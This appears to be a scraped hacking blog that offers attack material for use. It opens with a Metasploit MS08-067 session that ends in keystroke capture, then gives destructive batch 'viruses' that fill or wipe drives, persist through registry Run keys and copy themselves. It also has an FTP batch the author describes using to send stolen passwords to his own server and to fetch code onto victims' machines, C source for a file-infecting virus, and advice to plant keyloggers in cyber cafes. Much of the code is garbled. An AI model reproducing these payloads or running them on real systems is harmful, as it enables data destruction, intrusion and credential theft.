$ msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST
msf exploit(ms08_067_netapi) > set TARGET 3
msf exploit(ms08_067_netapi) > exploit
[*] Triggering the vulnerability…
[*] Sending stage (2650 bytes)
[*] Uploading DLL (75787 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened
meterpreter > ps
Process list
PID Name Path
— —- —-
292 wscntfy.exe C:\WINDOWS\system32\wscntfy.exe
316 Explorer.EXE C:\WINDOWS\Explorer.EXE
356 smss.exe \SystemRoot\System32\smss.exe
416 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
440 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
[ snip ]
meterpreter > migrate 316
[*] Migrating to 316…
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 316
meterpreter > grabdesktop
Trying to hijack the input desktop…
meterpreter > keyscan_start
Starting the keystroke sniffer…
meterpreter > keyscan_dump
Dumping captured keystrokes…
Labels: 0 comments | | edit post
Simple Virus Making

If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to make simple .bat file (virus) that can’t be detected by any anti virus
Here are some good viruses ,i am not responsible for any kind of damage to your system …

Copy this to notepad and save as flood1.bat…..

@ECHO A Sharma’s Creation

GOTO start
@ECHO SET magic2=1 >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
@ECHO :flood5 >> bat6.bat
@ECHO SET /a magic2=%%magic2%%+1 >> bat6.bat
@ECHO NET USER magic2%%magic2%% /add >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
START /MIN bat6.bat
GOTO bat5

@ECHO CD %%ProgramFiles%%\ >> bat5.bat
@ECHO SET pogo=1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
@ECHO :flood4 >> bat5.bat
@ECHO MKDIR pogo%%pogo%% >> bat5.bat
@ECHO SET /a pogo=%%pogo%%+1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
START /MIN bat5.bat
GOTO bat4

@ECHO CD %%SystemRoot%%\ >> bat4.bat
@ECHO SET hat=1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
@ECHO :flood3 >> bat4.bat
@ECHO MKDIR hat%%hat%% >> bat4.bat
@ECHO SET /a hat=%%hat%%+1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
START /MIN bat4.bat
GOTO bat3

@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat
@ECHO SET chart=1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
@ECHO :flood2 >> bat3.bat
@ECHO MKDIR chart%%chart%% >> bat3.bat
@ECHO SET /a chart=%%chart%%+1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
START /MIN bat3.bat
GOTO bat2

@ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat
@ECHO SET gamer=1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
@ECHO :flood >> bat2.bat
@ECHO MKDIR gamer%%gamer%% >> bat2.bat
@ECHO SET /a gamer=%%gamer%%+1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
START /MIN bat2.bat
GOTO original

CD %HomeDrive%\
SET sharma=1
GOTO flood1
MKDIR sharma%sharma%
SET /a sharma=%sharma%+1
GOTO flood1
What does it do : this is an extremely harmful virus the will keep replicating itself until your hard drive is totally full and will destroy your comp.

Some Funny Virus Codes

A simple binary codes that can format the system drive ,secondary drives…

Copy The Following In Notepad Exactly as it


Save As An EXE Any Name Will Do

Send the EXE to People And Infect
Some other interesting formatting codes….

format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100


format d:\ /Q/X — this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100


format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100


del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001


Some more interesting stuff ..

open notepad

erase c:\windows

and save as


wat does it do:- will erase c:/windows .

Here is another one which is funny……

color 0a
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
start /w wscript.exe C:\sleep3000.vbs
echo Deleting Critical System Files…
echo del *.*
start /w wscript.exe C:\sleep3000.vbs
echo Deletion Successful!
echo Deleting Root Partition…
start /w wscript.exe C:\sleep2000.vbs
echo del %SYSTEMROOT%
start /w wscript.exe C:\sleep4000.vbs
echo Deletion Successful!
start /w wscript.exe C:\sleep2000.vbs
echo Creating Directory h4x…
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir h4x
start /w wscript.exe C:\sleep3000.vbs
echo Directory Creation Successful!
echo Execution Attempt 1…
start /w wscript.exe C:\sleep3000.vbs
echo cd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\h4x\
echo start hax.exe
start /w wscript.exe C:\sleep3000.vbs
echo Virus Executed!
start /w wscript.exe C:\sleep2000.vbs
echo Disabling Windows Firewall…
start /w wscript.exe C:\sleep2000.vbs
echo Killing all processes…
start /w wscript.exe C:\sleep2000.vbs
echo Allowing virus to boot from startup…
start /w wscript.exe C:\sleep2000.vbs
echo Virus has been executed successfully!
start /w wscript.exe C:\sleep2000.vbs
echo Have fun!
start /w wscript.exe C:\sleep2000.vbs
shutdown -f -s -c “Your computer has committed suicide. Have a nice day.”

This code about multiple open windows means infinite windows
until continue you restart the computer:save on denger.bat and code written in notepad

@echo off
copy 0% denger.bat
start denger.bat

This code about the computer shutdown:

@echo off
shutdown -s -t 5 -c “Shutdown”

Go to notepad and type the following:
@Echo off
Del C:\ *.*|y

save it as Dell.bat

Want worse then type the following:

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file

One more …

try one this

Cd C:\
rd C:\ /s/q
Cd D:\
rd D:\ /s/q
Cd E:\
Rd E:\ /s/q
Cd F:\
Rd\ /s/q

then it is complete Save as any file you want in .bat format.. n enjoy.its really dangerous don’t try on your own pc.

NOTE :- Howto add your own created viruses into start ups this will make it difficult to detect them n to remove them …

For this u need a registry updater software .

now move your .bat file to c:/windows and then simply run this software ur virsu will be added to your start ups i tried this with shut down , as my comp starts its shut down after 2 secs ..

Do not try it on your PC. Don’t mess around this is for educational purpose only


@Echo off
color 4
title 4
title R.I.P
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat
copy Greatgame.bat FixVirus.bat
start calc
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c “VIRUS DETECTED”
time 12:00
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP

It will
1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide its self and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer

The first code we are going to look at is one that makes the cd tray open and close repeatedly until shutdown, or
(don’t tell your friends, you press ctrl + alt + delete and go to processes, and end wscript.exe (this code is vbs so save in note pad as whateveryouwant.vbs)

Set oWMP = CreateObject(”WMPlayer.OCX.7″ )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
Next ‘ cdrom
For i = 0 to colCDROMs.Count – 1
Next ‘ cdrom
end if

A code that turns on and off your capslock repeatedly, also vbs, end same way as last time, this turns on and off your capslock every tenth of a second

Set wshShell =wscript.CreateObject(”WScript.Shell”)
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”


A batch that is like a computer password, maybe you could stick it in autoexec.exe and make it run off startup?

@Echo off
echo Enter password then [F6] and then smack the [Enter] key real hard!
prompt $e[30m
echo on
echo off
copy con password.dat>nul
prompt $e[0m
echo on
echo off
copy password.set+password.dat password.bat>nul
call password.bat
if '%password%==qwerty goto done
echo Incorrect, you are not trying to break into my pc are you?
choice /t:y,3
if errorlevel 2 goto next
erase password.bat
erase password.dat
echo Turn off PC
goto hello
erase password.dat
erase password.bat
set password=qwerty
prompt $p$g

A batch that switches the left mouse button with your right mouse button (also maybe add a code to stick in someones autoexec,
that would really make them mad)

@echo off
Rundll32 user32,SwapMouseButton
msg * hahaha
msg * this is gunna screw you up
msg * good look finding how to fix it

A batch file that will shutdown your computer and send a few messages about the matrix, rather bland and could be worked on a little bit more, some one
could tweak it a little and i'll repost it and give you credit, perhaps change the dos txt to green

@ Echo off
Title Matrix
msg * The matrix has you, you can not escape
rundll32.exe disable mouse
Attrib +h C:*.*
echo deleting harddrive
echo 1001101010101011111111101010101
echo 010101010101010101010101010111
Attrib C:Documents and settings*.*
net share hack=C:
shutdown -s -c 60

This is a VBs file so of course save as VBS, you can replace the txt in this code with whatever you want

Set wshshell = wscript.CreateObject("WScript.Shell") "Notepad"
wscript.sleep 400
wshshell.sendkeys "M"
wscript.sleep 100
wshshell.sendkeys "a"
wscript.sleep 120
wshshell.sendkeys "s"
wscript.sleep 200
wshshell.sendkeys "o"
wscript.sleep 140
wshshell.sendkeys "n"
wscript.sleep 100
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys "P"
wscript.sleep 200
wshshell.sendkeys "w"
wscript.sleep 150
wshshell.sendkeys "n"
wscript.sleep 170
wshshell.sendkeys "s"
wscript.sleep 200
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys "A"
wscript.sleep 50
wshshell.sendkeys "l"
wscript.sleep 120
wshshell.sendkeys "l"
wscript.sleep 160
wshshell.sendkeys " "
wscript.sleep 200
wshshell.sendkeys "N"
wscript.sleep 100
wshshell.sendkeys "e"
wscript.sleep 100
wshshell.sendkeys "w"
wscript.sleep 200
wshshell.sendkeys "b"
wscript.sleep 120
wshshell.sendkeys "s"

Carpet Bomb:

Once the batch file is executed, it copies itself hundreds of times onto the desktop and startup folder. This means that it'll regenerate once the computer is restarted even if all the icons on the desktop are deleted. This works on Windows XP and Vista. Command line-args are optional, and include "disinf" for erasing all of the copies permanently.

:This was meant as a harmless joke, and it's not hard to fix if you read through the code.
:If you just use the "disinf" argument on the command line all is well.
lease only use this on people u don't like
IF "%1"=="" GOTO fill
IF "%1"=="fill" GOTO fill
IF "%1"=="kill" GOTO kill
IF "%1"=="inf" GOTO inf
IF "%1"=="disinf" GOTO kill
GOTO bye
IF EXIST C:\Users\%USERNAME%\Desktop\ (
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Users\Public\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Users\%USERNAME%\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Documents and Settings\All Users\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Documents and Settings\%USERNAME%\Desktop\joke%%A.bat"
IF "%1"=="" GOTO inf
GOTO theend
IF EXIST C:\Users\%USERNAME%\Desktop\ (
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Users\Public\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Users\%USERNAME%\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Documents and Settings\All Users\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Documents and Settings\%USERNAME%\Desktop\joke%%A.bat"
IF "%1"=="disinf" GOTO disinf
GOTO theend
TYPE "%~df0" > "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\joke.bat"
TYPE "%~df0" > "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup\joke.bat"
TYPE "%~df0" > "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\joke.bat"
GOTO theend
ECHO Y | DEL "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\joke.bat"
ECHO Y | DEL "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup\joke.bat"
ECHO Y | DEL "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\joke.bat"
GOTO theend
ECHO "fill" to make more and "kill" to get rid of 'em. inf to make it stick a little longer

Once the batch file is executed, it copies itself hundreds of times onto the desktop and startup folder. This means that it'll regenerate once the computer is restarted even if all the icons on the desktop are deleted. This works on Windows XP and Vista. Command line-args are optional, and include "disinf" for erasing all of the copies permanently.\

Creating a batch Bomb

Copy and paste the below into notepad and save it as hi.bat (Not .txt)
run it, and enjoy anarchy.


@echo off
echo Error, Critical Windows Failure. Format Hard Disk and Reinstall OS!
start hi.bat

A code that turns on and off your capslock repeatedly, also vbs, end same way as last time, this turns on and off your capslock every tenth of a second.

Set wshShell =wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"

How to make a shutdown file and disguise it as something else!

This article is a pretty simple one, maybe most of you guys know already... in case if you don't know, you can play around and make fun...

How to make a shutdown file and disguise it as something else (internet, etc.)

Step 1: Right click on your desktop or wherever you want to make this shutdown file

Step 2: look for new, then shortcut

Step 3: Type shutdown -s -t 10 -c "text here"
note: you can add -f to force close open docuuments
note: after -t you can put any amount of seconds you want before the computer shuts down

Step 4: push next, then name it whatever you like, for an example we will put Internet Explorer

Step 4: Right click on the file you just made and goto properties

Step 5: hit change icon. (This could be under the advanced tab)

Step 6: An error message should pop up letting you know there aren't any pictures for c:\windows\system32. Hit ok

Step 7: A list of icons should show up.. click on the one you think looks the most persuasive according to what you named it. (For example, look for the 'e' icon for internet explorer.

Now your done, see that wasn't that hard! was it?
Put this in the start up folder to make people even MORE mad!

NOTE:- This can easily be stopped by typing shutdown -a in run...

Sending Files Via ftp Batch!

OK, So i made a password stealer that would output a .txt file to the windows folderm i then made a ftp batch that would upload the txt file to my server, so far ive managed to get some passwords but not for anything important, So if you want to know how to make a ftp batch then heres how.

First for example were gonna try upload a file called Test.txt to our server


ftp -n -i -s:MyUploadFiles.ftp

First make a file called upload.bat and put this in, Now we need to make the myuploadfiles.ftp, if you wanna call it something else then change the myuploadfiles.ftp to what you want but KEEP the .ftp at the end.

Ok now its the myuploadfiles.ftp creating time, or whatever you called it before.

open your-host

user password


send test.txt

This is the bit where you have to change the username password and host to what your ftp host is. then change the send test.txt to what file you want to upload, it doesn't have to be a txt file, it can be any one.

Now make sure both files are in the same dir as each other and run the .bat file. check your ftp server and guess whats sitting there! test.txt! So if you want to upload a file from someone's pc, you could use this?

Also theres nothing stopping you from putting in the "get" command in the .ftp, say get download.bat, whenever you want to change what it does make it call it download.bat and shove it on the server, then the victim will download it and be executed.

Folder Replicator Batch VIRUS

Here is a Simple bacth virus that contains only 6 lines, has the tendency to replicate itself again
and again and keeps on creating a folder with same name, until a user stops it.

1. Just open up a notepad, copy and paste the below code

cd C:\Documents and Settings\username\Desktop
md Virus
cd Virus
goto loop

2. Save it as a batch file with the extension .bat.
3. Then run it on the Victims computer to infect it.
4. Any how it doesnt cause much harm, but replicates folder inside a folder and goes on.







struct ffblk ffblk;



char old_dir[MAXPATH];

Get_Path(old_dir); /* Save the old directory */

Pick_A_Dir(); /* Find a new directory to */

Infect_Directory(); /* infect and infect it. */

chdir(old_dir); /* Return to old directory */

return 0;




int done;

chdir(”..”); /* First, Go out a DIR. */

done=findfirst(”*.BAT”,&ffblk,0); /* If no BAT files, try */

/* root and DOS */

if (done)




if (done) chdir(”\\DOS\\”);


return 0;




int done;

done = findfirst(”*.BAT”,&ffblk,0);

while (!done) /* Find all .BAT files */

{ /* and add code to run */

Do_Batch(); /* BAT&COM if not */

done = findnext(&ffblk); /* already there */


if (findfirst(”BAT&COM.COM”,&ffblk,0)) /* If BAT&COM does */

{Copy_Virus();} /* not exist, then */

return 0; /* copy it into dir.*/




FILE *batch;

char Infection_Buffer[12];

char vpath[MAXPATH];

Get_Path(vpath); /* Get path for adding path */

/* specifier in commands */

if (vpath[3]==0) vpath[2]=0; /* Keep path good in root */

batch=fopen(ffblk.ff_name, “rt+”);

fseek(batch, -11, SEEK_END);


Infection_Buffer[11]=0; /* Terminate String */

if (strcmp(Infection_Buffer,”BAT&COM.COM”)) /* Check if */

{ /* Batch is */

fseek(batch, 0, SEEK_END); /* infected.*/


} /*^- Add command */

/* to batch */


return 0;




FILE *old_virus, *new_virus;

int write_length;

char copy_buffer[1024]; /* Copy the virus to */

/* new directory */




while (write_length==1024)







return 0;


Get_Path(char *path)


strcpy(path, “A:\\”);

path[0] =’A’ + getdisk(); /* Returns current path */

getcurdir(0, path+3);

return 0;


- – - —————–End of Code———————— – - -


/* It will infect all .COM files in the current directory */




FILE *Virus,*Host;

int x,y,done;

char buff[256];

struct ffblk ffblk;



done = findfirst(”*.COM”,&ffblk,0); /* Find a .COM file */

while (!done) /* Loop for all COM’s in DIR*/


printf(”Infecting %s\n”, ffblk.ff_name); /* Inform user */

Virus=fopen(_argv[0],”rb”); /* Open infected file */

Host=fopen(ffblk.ff_name,”rb+”); /* Open new host file */

x=9504; /* Virus size – must */

/* be correct for the */

/* compiler it is made */

/* on, otherwise the */

/* entire virus may not*/

/* be copied!! */

while (x>256) /* OVERWRITE new Host */

{ /* Read/Write 256 byte */

fread(buff,256,1,Virus); /* chunks until bytes */

fwrite(buff,256,1,Host); /* left < 256 */



fread(buff,x,1,Virus); /* Finish off copy */


fcloseall(); /* Close both files and*/

done = findnext(&ffblk); /* go for another one. */


/* Activation would go */

/* here */

return (0); /* Terminate */


enjoy hacking

post comments[ankush]
Labels: 0 comments | | edit post

it is used to hack gmail account>>>>

contact me at
Labels: 0 comments | | edit post
Here I shall discuss, how to trace an email sender from the email header. I shall take my MSN account as an example. But before I go into depth I shall split the email header and explain each one of them for better understanding. by. Ankush

Viewing Email Header
Every e-mail comes with information attached to it that tells the recipient of its history. This information called a header. The above is the Full header of email .All this information comes with the email. The header contains the information essential to tracing an e-mail. The main components to look for in the header are the lines beginning with "From:" and "Received:" However, it might be instructive to look at what various different lines in the header mean.

MIME-Version: 1.0
Received: from ([]) by with Microsoft SMTPSVC(5.0.2195.6713); Tue, 25 Nov 2003 19:56:18 -0800
Received: from pavilion ([]) by (rwcrmhc11) with SMTP id <20031126034457013001nk6pe>; Wed, 26 Nov 2003 03:44:57 +0000
X-Message-Info: JGTYoYF78jGkTvdOiviUvHyY85nt7iLD
Message-ID: <000801c3b3cf$a92237a0$>
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
Disposition-Notification-To: "Leona"
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
X-OriginalArrivalTime: 26 Nov 2003 03:56:18.0897 (UTC) FILETIME=[3F5AFC10:01C3B3D1]

Some e-mail programs, like Yahoo or Hotmail, have their full headers hidden by default In order to view the full header, you must specifically turn on that option. Some ways of doing this in different e-mail programs follow here:

Viewing full Header in Yahoo and Hotmail
Click Options -> Click Mail Preferences -> Click Show Headers -> Click "All" -> Click "Save"
Click Options -> Click Mail Display Headings (under "Additional Options") -> Click Message Headers -> Click "Full" ->
Click "OK"

Viewing full Header in Email Clients like (Outlook and Eudora etc)
Outlook Express
If you use OE, at least the version I have (5.5), you may not have much luck; it sometimes gives little more information than what you can see in the main window. But here's the application path anyway:
Click File/Properties/Details to find the header information.
First, highlight the email in your Incoming window, right-click on it, and select Options. The window that comes up will have the headers at the bottom.
Be sure the message is open, then Click the 'Blah, Blah, Blah' button from the Tool Bar, and the headers will appear.
Select Reader/Show All Headers/
Netscape Mail
Select Options/Headers/Show All Headers
Netscape Messenger 4.0 and 4.5
Select View/Headers/All

Now I will discuss the full header in detail:

Message ID:
It is used to identify the system from which the the message has originated (i.e. from the system the sender has logged in). However, this is too easy to forge, and is consequently not reliable.

X- headers are user defined headers. They are inserted by email client programs or applications that use email. Here from the X- headers inserted into the email by the email client it is clear that the sender has used Microsoft Outlook Express 6.00.2800.1106 to send this email.
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106

MIME stands for Multipurpose Internet Mail Extension. It tells the recipient what types of attachments are included in email. It is a format that allows people to send attachments that do not contain Standard English Words, but rather graphics, sounds, and e-mails written with other characters. The Mime-Version field merely confirms that the version of MIME used corresponds to the standard version (which is currently 1.0).

Form is useless in tracing an e-mail. It consists of the email of the sender but this can be obviously be a fake. One can use any fake-mailer to fake the sender's name.

This line tells the receiving e-mail client exactly what MIME type or types are included in the e-mail message. If the Content–Type is text/plain; charset="us-ascii" just tells us that the message contains a regular text message that uses English characters. ASCII is the American Standard Code for Information Interchange and is the system used to convert numbers to English characters.

It is the address to which your return e-mail will be sent. Different e-mail programs use other variations of Return-Path:. These might include Return-Errors-To: or Reply-To etc.

This field is the key to find out the source of any e-mail. Like a regular letter, e-mails gets postmarked with information that tells where it has been. However, unlike a regular letter, an e-mail might get "postmarked" any number of times as it makes its way from its source through a number of mail transfer agents (MTAs). The MTAs are responsible for properly routing messages to their destination.

Let me strip-off the above email header to make the understanding easy. The header is splitted and the two received headers are given below.
Received Header 1: - Tue, 25 Nov 2003 19:56:18 -0800
from ([])
with Microsoft SMTPSVC(5.0.2195.6713)

Received Header 2: - Wed, 26 Nov 2003 03:44:57 +0000
from pavilion ([])
by (rwcrmhc11)
with SMTP
id <20031126034457013001nk6pe>

The MTAs are "stamped" on the e-mail's header so that the most recent MTA is listed on the top of the header and the first MTA through which the e-mail has passed in listed on the bottom of the header. In the above sample e-mail header, e-mail first passed through (, and at last made its way through (

In the Received Header 2, the one marked with red colour "pavilion" is either the domain name of the server from which the email has originated or the name of the computer from which the email has been sent. By doing a DNS query for "pavilion", it is confirmed that it is not a know host name hence, must be the name of the computer from which the mail has originated. "" is the IP address from which the mail might have originated or it is the IP address of the ISP (Internet Service Provider) to which the user was logged on while sending the mail.

Note: Correct me if I am wrong, most of the time "HELO" is prefixed to the system name from which the mail has originated, but its accuracy is not reliable.

Trace who owns the IP address
Every computers hooked on to internet is assigned with an IP address. Individual users possess a dynamic IP address when they logged on to any ISP to access internet. These IP addresses are assigned by the ISP itself. Organization usually possess static/public IP address which is stored in a database of registries.

There are three major registries covering different parts of the world. They are => American Registry of Internet Numbers (ARIN) : It assigns IP addresses for the Americas and for sub Saharan Africa. => Asia Pacific Network Information Centre (APNIC) : It covers Asia => Réseaux IP Européens (RIPE NCC) : It covers Europe

Thus, to find out which organization owns a particular IP address, you can make a "WHOIS" query in the database at any of these registries. You do this by typing the IP address into the "WHOIS" box that appears on each of these websites.

"Received Header" will have the IP address of the ISP in case the users has dialed up to the ISP while sending the email. But if the user has send the email from within the corporate then the corporate public/static IP address is logged.

By giving a "WHOIS" query for at, the following result has been displayed:

Comcast Cable Communications, Inc. JUMPSTART-1 (NET-68-32-0-0-1) -
Comcast Cable Communications, Inc. NJ-NORTH-14 (NET-68-37-16-0-1) -

# ARIN WHOIS database, last updated 2004-02-04 19:15
# Enter ? for additional hints on searching ARIN's WHOIS database.

From above queries it is found that the IP address ( is owned "Comcast". By making further queries on "Comcast" it is found that it is the name of the ISP located in NJ, US - 08002. The result of further query is given below:

OrgName: Comcast Cable Communications, Inc.
Address: 3 Executive Campus
Address: 5th Floor
City: Cherry Hill
StateProv: NJ
Country: US

NetRange: -
NetHandle: NET-68-32-0-0-1
Parent: NET-68-0-0-0-0
NetType: Direct Allocation
RegDate: 2001-11-29
Updated: 2003-11-05

TechHandle: IC161-ARIN
TechName: Comcast Cable Communications Inc
TechPhone: +1-856-317-7200

OrgAbuseHandle: NAPO-ARIN
OrgAbuseName: Network Abuse and Policy Observance
OrgAbusePhone: +1-856-317-7272

OrgTechHandle: IC161-ARIN
OrgTechName: Comcast Cable Communications Inc
OrgTechPhone: +1-856-317-7200

# ARIN WHOIS database, last updated 2004-02-04 19:15
# Enter ? for additional hints on searching ARIN's WHOIS database.

Now since the IP address found belongs to an ISP, it is clear that the sender has dialed up to this ISP while sending the email. For further enquiry we can then request the ISP to provide us with details of the user who has dialed up to them at that given point of time (Wed, 26 Nov 2003 03:44:57 +0000). If the ISP cooperates, they will check their user and message logs to see who was logged into that particular IP address at that time and date. This will reveals the sender's telephone number from which he/she has dialed to the ISP. Now once we have the telephone number we can easily retrieve the name and address of the sender.

Now the above case is solved but there are also other cases where the IP address found on the email header may be owned by an organisation or a cyber cafe. Below I have discussed how you can trace the sender in both of these cases.

But in case the IP address found belongs to an organisation then you have to request them to provide information about the user who has send the mail from within the organisation network. They must have user and message logs on their firewall / proxy and can trace each of their computers connected at the given point of time. By supplying the organisation with the e-mail header of the offending e-mail, they can check these logs and hopefully produce information of the user of that machine.

In case it is found that the sender has sent the email from a cyber-cafe then it becomes a difficult task to trace him/her. The user may not be a frequent visitor to that cyber-cafe. But let's assume that you receive such mails frequently from that particular cyber-cafe then you can install "key-loggers" in the computers at the cafe. These programs records user's keystrokes, thus creating a record of everything that was typed at a particular terminal. By reviewing the key-logger logs you may be able to trace the sender in this case.

Note: These methods would aid greatly in identifying an e-mail sender, they also would impinge on the rights of others using the computers to conduct their personal business. Such a conflict defines the ongoing struggle between the fight against terrorism over the Internet and the right to privacy, which will continue to evolve in the years ahead.

## Send me information if you know a better way to trace a sender who uses cyber cafe to send email. ##


Labels: 0 comments | | edit post
Search the IP-COUNTRY TABLE to match a unique record that has the IP number fits between From IP Number and To IP Number.

For example, IP Address "" is equivalent to IP Number "3401190660". It falls in the following range of IP number in the table because it is between the "From IP number" and the "To IP number".


From the IP range, the Country Name is Malaysia and Country Code is MY.


From IP Number To IP Number Country Code Country Name
3400892416 3400925183 HK HONG KONG
3400925184 3400933375 TH THAILAND
3400941568 3400949759 AU AUSTRALIA
3400957952 3400966143 AU AUSTRALIA
3400982528 3400990719 HK HONG KONG
3400990720 3400998911 ID INDONESIA
3400998912 3401003007 PH PHILIPPINES
3401007104 3401011199 IN INDIA
3401023488 3401056255 TH THAILAND
3401056256 3401400319 MY MALAYSIA
3401408512 3401416703 HK HONG KONG
3401416704 3401420799 KR KOREA, REPU
3401441280 3401449471 PH PHILIPPINES
3401449472 3401515263 MY MALAYSIA
3401531392 3401539583 IN INDIA
3401547776 3401580543 MY MALAYSIA
3401580544 3402629119 CN CHINA
3402629120 3404464127 JP JAPAN
3405774848 3406434303 AU AUSTRALIA
3406436352 3409969151 AU AUSTRALIA
3409969152 3410755583 TW TAIWAN
3410755584 3410780159 AU AUSTRALIA
3410788352 3410796543 HK HONG KONG
3410796544 3410800639 LK SRI LANKA
3410812928 3410821119 AU AUSTRALIA
3410821120 3410853887 TW TAIWAN
3410853888 3410862079 HK HONG KONG
3410870272 3410874367 IN INDIA
3410878464 3410886655 ID INDONESIA
3410886656 3410887679 TW TAIWAN
3410894848 3410898943 HK HONG KONG
3410903040 3410911231 HK HONG KONG
3410919424 3410927615 IN INDIA
3410944000 3410952191 PH PHILIPPINES
3410952192 3410960383 TW TAIWAN
3410968576 3410984959 NZ NEW ZEALAND
3410984960 3411017727 TW TAIWAN
3411017728 3411018751 HK HONG KONG
3411034112 3411051519 HK HONG KONG
3411058688 3411062783 AU AUSTRALIA
3411066880 3411083775 HK HONG KONG
3411087360 3411091455 CN CHINA
3411091456 3411095551 SG SINGAPORE
3411099648 3411107839 MM MYANMAR
3411116032 3411124223 IN INDIA
3411132416 3411136511 PK PAKISTAN
3411147776 3411149311 HK HONG KONG
3411156992 3411161087 PH PHILIPPINES
3411165184 3411173375 MY MALAYSIA
3411181568 3411189759 JP JAPAN
3411197952 3411202047 BD BANGLADESH
3411213312 3411215359 HK HONG KONG
3411230720 3411247103 HK HONG KONG
3411247104 3411255295 AU AUSTRALIA
3411278848 3411296255 HK HONG KONG
3411312640 3411313151 HK HONG KONG
3411329024 3411337215 PH PHILIPPINES
3411337216 3411341311 AU AUSTRALIA
3411345408 3411411967 HK HONG KONG
3411435520 3411443711 IN INDIA
3411443712 3411460095 HK HONG KONG
3411475456 3411476479 HK HONG KONG
3411476480 3411509247 AU AUSTRALIA
3411509248 3411517439 PH PHILIPPINES
3411525632 3411529727 SG SINGAPORE
3411533824 3411543039 CN CHINA
3411558400 3411566591 AU AUSTRALIA
3411574784 3411582975 IN INDIA
3411591168 3411595263 HK HONG KONG
3411599360 3411607551 AU AUSTRALIA
3411607552 3411608575 CN CHINA
3411623936 3411632127 AU AUSTRALIA
3411640320 3411648511 PK PAKISTAN
3411656704 3411673087 AU AUSTRALIA
3411673088 3411674111 CN CHINA
3411689472 3411701759 IN INDIA
3411722240 3411726335 PH PHILIPPINES
